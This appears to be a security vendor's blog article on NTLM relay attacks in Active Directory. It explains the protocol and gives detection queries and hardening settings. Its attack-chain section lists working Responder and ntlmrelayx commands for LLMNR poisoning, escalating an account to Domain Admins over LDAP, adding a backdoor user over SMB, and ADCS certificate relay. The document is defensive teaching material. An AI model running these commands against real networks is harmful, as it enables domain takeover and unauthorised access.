๐ŸขActive DirectoryNetworkConfigAttack Paths

NTLM Relay Attacks: Hijacking Authentication Without Cracking Passwords

NTLM relay lets attackers intercept authentication and impersonate users across the network without cracking passwords. Learn how the attack works and how to eliminate the exposure.

EtcSec Security Team

What Is NTLM Relay?

NTLM relay is one of the most reliable network-level attack techniques in Active Directory environments. It abuses the challenge-response design of NTLM authentication: the attacker captures a victim's authentication attempt and forwards it, in real time, to another service, which then authenticates the attacker as the victim without the password ever being cracked.

The attack requires only network access to the target segment. No credentials, no domain account, no exploits. In many internal networks, it leads directly to administrative access on dozens of machines within minutes of gaining initial access.

The root cause combines three factors: NTLM is still widely used, SMB signing is disabled on most workstations, and legacy protocols like LLMNR and NBT-NS allow attackers to intercept authentication attempts by responding to broadcast queries.


How It Works

NTLM uses a three-message challenge-response:

  1. Client sends NEGOTIATE
  2. Server sends CHALLENGE (a random nonce)
  3. Client sends AUTHENTICATE (a response computed from the user's NT hash over the server's challenge)

In a relay attack, the attacker sits between client and server and forwards each message to a target service. The target accepts the authentication because it receives a valid NTLM response; it cannot tell that the response was produced by a client that intended to talk to someone else.

Victims are coerced into sending authentication via LLMNR/NBT-NS poisoning (broadcast name resolution) or print spooler coercion (SpoolSample), forcing machines to authenticate to the attacker's listener.
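To make concrete why a forwarded AUTHENTICATE is accepted yet a signing requirement still stops the relay, here is an added Python model of the NTLMv2 computation from MS-NLMP 3.3.2; it is not the article's code. The NT hash is a constructed constant, and sign() is a simplified HMAC stand-in for the real NTLM MAC.

```python
import hmac
import os

# Constructed 16-byte stand-in for the victim's NT hash (MD4 of the UTF-16LE password).
# Only the client and the authenticating server/DC ever hold it; the relay does not.
VICTIM_NT_HASH = bytes.fromhex("00112233445566778899aabbccddeeff")

def response_key(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 ResponseKeyNT (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash
    over UPPER(user) + domain encoded as UTF-16LE."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), "md5").digest()

def ntlmv2_authenticate(key: bytes, server_challenge: bytes, client_blob: bytes):
    """Message 3 on the client: NTProofStr travels on the wire; the SessionBaseKey is
    derived from the proof and the secret key and never leaves the host."""
    nt_proof = hmac.new(key, server_challenge + client_blob, "md5").digest()
    session_base_key = hmac.new(key, nt_proof, "md5").digest()
    return nt_proof, session_base_key

def sign(session_key: bytes, message: bytes) -> bytes:
    # Simplified stand-in for the NTLM MAC: HMAC-MD5 over the message, truncated to 8 bytes.
    return hmac.new(session_key, message, "md5").digest()[:8]

def relay_scenario(user: str = "jsmith", domain: str = "CORP") -> dict:
    """Model the relay: the target's CHALLENGE is forwarded to the victim and the victim's
    AUTHENTICATE is forwarded back. Returns what each party can and cannot do."""
    key = response_key(VICTIM_NT_HASH, user, domain)
    challenge = os.urandom(8)                  # CHALLENGE issued by the *target* server
    blob = os.urandom(8) + b"\x00" * 8         # constructed client timestamp/nonce blob
    # Victim answers the relayed challenge; the relay now holds nt_proof, blob and challenge.
    nt_proof, victim_key = ntlmv2_authenticate(key, challenge, blob)
    # Target (via the DC, which has the NT hash) recomputes the proof and derives the same key.
    expected_proof, target_key = ntlmv2_authenticate(key, challenge, blob)
    accepted = hmac.compare_digest(nt_proof, expected_proof)
    # Without the NT hash the relay can only build a key from what it saw on the wire.
    relay_key = hmac.new(nt_proof, challenge + blob, "md5").digest()
    request = b"SMB2 TREE_CONNECT \\\\target\\C$"
    relay_can_sign = hmac.compare_digest(sign(relay_key, request), sign(target_key, request))
    return {
        "target_accepts_relayed_auth": accepted,   # True: the relayed proof is valid
        "client_and_target_keys_match": victim_key == target_key,
        "relay_can_sign": relay_can_sign,          # False: a signing requirement blocks the relay
    }
```

The proof check passes because the relay changed nothing; what the relay lacks is the session key, which is why the Remediation section's SMB and LDAP signing settings remove the exposure rather than merely hiding it.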


The Attack Chain

Step 1 - Enable Relay Infrastructure

# Responder: poison LLMNR/NBT-NS (its own SMB/HTTP servers disabled so authentication reaches the relay instead of being captured)
responder -I eth0 -rdw --no-HTTP-Server --no-SMB-Server

# ntlmrelayx: relay to target list
ntlmrelayx.py -tf targets.txt -smb2support -socks

Step 2 - Capture and Relay Authentication

When any machine queries a non-existent hostname via broadcast, Responder answers with the attacker's address, so the victim's authentication attempt arrives at the ntlmrelayx listener and is relayed onward:

# Output when relay succeeds:
# [*] Authenticating against smb://10.10.0.50 as CORP/jsmith SUCCEED

Step 3 - Exploit to High-Value Targets

# Relay to LDAP: escalate attacker account to Domain Admins
ntlmrelayx.py -t ldap://dc01.corp.local --escalate-user attacker

# Relay to SMB โ€” execute commands as victim
ntlmrelayx.py -tf targets.txt -smb2support -c "net user backdoor P@ss! /add"

# Relay to ADCS web enrollment (ESC8)
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp --adcs --template Machine

Step 4 - Domain Escalation

LDAP relay to a DC escalates directly to Domain Admin. ADCS relay yields a machine certificate usable for Kerberos authentication, which means full domain access.


Detection

Windows Event IDs

Event ID       | Source | What to Look For
4624 (Type 3)  | Target | Network logon from unexpected source IP
4776           | DC     | NTLM credential validation; watch for NTLMv1
4625           | Target | Failed logon from relay failures

SIEM Detection Query (Elastic KQL)

event.code: "4624" AND
winlog.event_data.LogonType: "3" AND
winlog.event_data.AuthenticationPackageName: "NTLM" AND
NOT winlog.event_data.WorkstationName: *DC*

KQL cannot compare one field with another, so this query only narrows the stream to NTLM network logons whose claimed workstation is not a domain controller; checking that WorkstationName actually belongs to IpAddress, the relay tell-tale, has to happen in a correlation rule or in post-processing.

💡 Tip: NTLM relay leaves a distinct pattern: the same account authenticating to multiple machines in a short window from a source IP that is not its usual workstation. Correlate Type 3 logons with network topology.
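The correlation described in the tip, as an added Python example that is not part of the original article: it applies the same narrowing as the KQL to a constructed batch of 4624 records, then flags source IPs that fan out to several hosts as one account within a short window and workstation names that do not match the IP in a constructed asset inventory.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, host, user, workstation, ip, package="NTLM", logon_type="3"):
    """Build one constructed 4624 record, using winlog.event_data field names."""
    return {"ts": datetime.fromisoformat(ts), "host": host, "TargetUserName": user,
            "LogonType": logon_type, "AuthenticationPackageName": package,
            "WorkstationName": workstation, "IpAddress": ip}

# Constructed sample: a normal logon, a Kerberos logon, a DC logon, and a burst of NTLM
# network logons for jsmith arriving from 10.10.0.99, which is not his workstation's IP.
EVENTS = [
    ev("2026-01-10T08:55:00", "FS01", "jsmith", "WS-JSMITH", "10.10.0.21"),
    ev("2026-01-10T08:56:00", "APP01", "adm", "WS-ADMIN", "10.10.0.22", package="Kerberos"),
    ev("2026-01-10T09:00:05", "FS01", "jsmith", "WS-JSMITH", "10.10.0.99"),
    ev("2026-01-10T09:00:09", "FS02", "jsmith", "WS-JSMITH", "10.10.0.99"),
    ev("2026-01-10T09:01:30", "APP01", "jsmith", "WS-JSMITH", "10.10.0.99"),
    ev("2026-01-10T09:01:45", "DC01", "jsmith", "WS-JSMITH", "10.10.0.99"),
]
# Constructed inventory: the IP each workstation name is expected to authenticate from.
INVENTORY = {"WS-JSMITH": "10.10.0.21", "WS-ADMIN": "10.10.0.22"}

def ntlm_network_logons(events):
    """Same narrowing as the KQL: Type 3, NTLM package, target host not a domain controller."""
    return [e for e in events if e["LogonType"] == "3"
            and e["AuthenticationPackageName"] == "NTLM" and not e["host"].startswith("DC")]

def relay_candidates(events, inventory, window=timedelta(minutes=5), min_hosts=3):
    """Findings: ('workstation_ip_mismatch', user, ip, host) when the claimed WorkstationName
    does not belong to the source IP, and ('fan_out', user, ip, n) when one account from one
    source IP reaches at least min_hosts distinct targets inside the window."""
    findings, by_key = [], defaultdict(list)
    for e in ntlm_network_logons(events):
        by_key[(e["TargetUserName"], e["IpAddress"])].append(e)
        expected_ip = inventory.get(e["WorkstationName"])
        if expected_ip and expected_ip != e["IpAddress"]:
            findings.append(("workstation_ip_mismatch", e["TargetUserName"], e["IpAddress"], e["host"]))
    for (user, ip), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            hosts = {e["host"] for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(hosts) >= min_hosts:
                findings.append(("fan_out", user, ip, len(hosts)))
                break
    return findings
```

On the sample, the single benign logon from 10.10.0.21 produces nothing, while the burst from 10.10.0.99 yields three mismatch findings and one fan-out finding for jsmith.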


Remediation

💡 Quick Win: Enable SMB signing on all workstations via GPO. This single change blocks relayed authentication to SMB on those hosts.

1. Enable SMB Signing

# GPO: Security Options
# "Microsoft network server: Digitally sign communications (always)" = Enabled
# "Microsoft network client: Digitally sign communications (always)" = Enabled

# Verify
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters" -Name RequireSecuritySignature
# Should return 1

2. Disable LLMNR and NBT-NS

# Disable LLMNR via GPO:
# Computer Configuration > Administrative Templates > Network > DNS Client
# "Turn off multicast name resolution" = Enabled

# Disable NetBIOS over TCP/IP
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_*" `
    -Name NetbiosOptions -Value 2

3. Enforce NTLMv2 Only

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name LmCompatibilityLevel -Value 5

4. Enable LDAP Signing on DCs

Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters" `
    -Name "LDAPServerIntegrity" -Value 2

How EtcSec Detects This

EtcSec audits network-level authentication settings that enable or prevent NTLM relay.

NTLMV1_ALLOWED identifies domains where NTLMv1 is still permitted: the weakest NTLM version, and the easiest to relay and crack.

WDIGEST_ENABLED flags cleartext credential caching that compounds the impact of any relay-based credential theft.

Network checks also evaluate SMB signing, LDAP signing requirements, and NTLM restriction policies: the controls that together make relay attacks infeasible.

โ„น๏ธ Note: EtcSec audits network authentication security in every AD scan. Run a free audit to identify NTLM relay exposure.



© 2026 EtcSec. All rights reserved.
